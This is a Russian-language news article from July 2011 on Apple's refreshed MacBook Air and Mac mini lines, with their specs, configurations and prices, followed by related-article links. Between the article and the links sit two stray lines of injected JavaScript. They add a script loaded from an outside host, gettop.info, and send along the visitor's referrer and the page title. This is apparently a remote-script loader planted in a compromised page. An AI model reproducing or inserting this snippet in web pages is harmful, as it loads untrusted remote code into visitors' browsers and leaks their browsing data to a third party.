Встречайте: новые MacBook Air и Mac mini!

21.07.2011, Новости, Кирилл Месяц

Apple Store вчера вечером снизил цены, и множество людей уже приготовили свои кредитки в готовности приобрести новый яблочные продукты. Итак, Apple обновила свои Mac mini и MacBook Air с новейшими процессорами Sandy Bridge и скоростным портом Thunderbolt от Intel. В качестве бонуса, также были обновлены мониторы Cinema Display, которые также получили поддержку технологии Thunderbolt. Новое семейство MacBook Air наконец-то оснастили подсвечиваемой клавиатурой. Как и прежде, новые «воздухи» представлены моделями с дисплеем 11,6 и 13 дюймов, каждая из которых доступна в нескольких видах комплектации: базовой, более мощной и «под заказ».

Базовая комплектация 11,6 дюймовых моделей представлена процессором 1,6 ГГц, 2 Гб оперативной памяти и 64 Гб флеш-памяти; более дорогие модели имеют вдвое увеличенные оперативную и флеш- память. Важное примечание: поскольку память впаяна в материнскую плату, то решение о необходимом объеме памяти требуется принимать во время покупки девайса. То же самое касается и онлайн магазина Apple Store.  Базовая комплектация 13-дюймовой модели представлена процессором 1,7 ГГц, 4 Гб оперативной памяти и 128 Гб флеш-памяти, в то время как более дорогой 13-дюймовый MacBook Air удваивает объем памяти до 256 Гб. Сборка на заказ модели с диагональю 11,6 или 13 дюймов позволит оснастить компьютер процессором 1,8 ГГц и 4 Гб оперативной памяти; для 13-дюймовый «воздуха» доступна возможность установки 256 Гб флеш-памяти. Все MacBook Air работают на графическом процессоре HD Graphics 3000  от Intel с 256 Мб (11,6-дюймовые модели) или 384 Мб (13-дюймовые модели) памяти DDR3 SDRAM, используемой совместно с основной памятью. Стоит отметить, что встроенная камера Face-Time не получила поддержку съемки HD — видео. Перейдем к Mac mini.

Новые Mac mini включают в себя процессоры Sandy Bridge Core i5 и Core i7, новую дискретную графику AMD Radeon HD 6630M и порт Thunderbolt, таким образом обеспечивая «вдвое увеличенную производительность центрального и графического процессоров по сравнению с предыдущим поколением». Но на этот раз Mac mini были представлены без оптического привода. Вместо этого, однако вы можете подключить ваш mini к другому PC или Mac, или же подключить внешний MacBook Air SuperDrive, если действительно есть необходимость в оптических дисках, являющихся морально устарешими. Новая линейка имеет такой же алюминиевый дизайн корпуса, как и его предшественник, площадь корпуса — 7,7 квадратных дюйма, толщина — 1,4 дюйма. Модель в базовой комплектации включает в себя двухъядерный процессор Intel Core i5 частотой 2,3 ГГц, 2 Гб оперативной памяти и жесткий диск на 500 Гб. Более дорогие машины: 2,5 ГГц двухъядерный процессор Intel Core i5, 4 Гб оперативной памяти, жесткий диск на 500 Гб. Под заказ можно установить двухъядерный процессор Core i7 частотой 2,7 ГГц, до 8 Гб оперативной памяти и жесткий диск на 750 Гб с возможностью добавления или замены твердотельного накопителя на 256 Гб. Серверный вариант с Lion Server включает в себя четырехъядерный процессор Intel Core i7, 4 Гб оперативной памяти и 2 жестких диска на 500 Гб. Под заказ возможна установка 8 Гб оперативной памяти, двух винчестеров по 750 Гб каждый или до двух 256 Гб твердотельных накопителей. Кастомная конфигурация всех моделей включает в себя до 8 Гб оперативки, более быстрые 7200 RPM жесткие диски и твердотельные накопители на 256 Гб. Базовая комплектация Mac mini обойдется в $599, более мощная — в $799, серверная — $999. Все машины доступны для заказа в интернет-магазине компании.

document.currentScript.parentNode.insertBefore(s, document.currentScript);

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;

Читайте также:

  1. Новые Mac Pro и MacBook Air с OS X Lion на этой неделе
  2. OS X Lion и новые MacBook Air в эту среду?
  3. Новые iMac и MacBook Pro «делают» Mac Pro в Final Cut Pro X тестах
  4. Новые MacBook Air «в конце следующей недели»
  5. Новый MacBook Air с более быстрым и энергосберегающим SSD?

Оставить комментарий

Обязательно.

Обязательно. Не публикуется.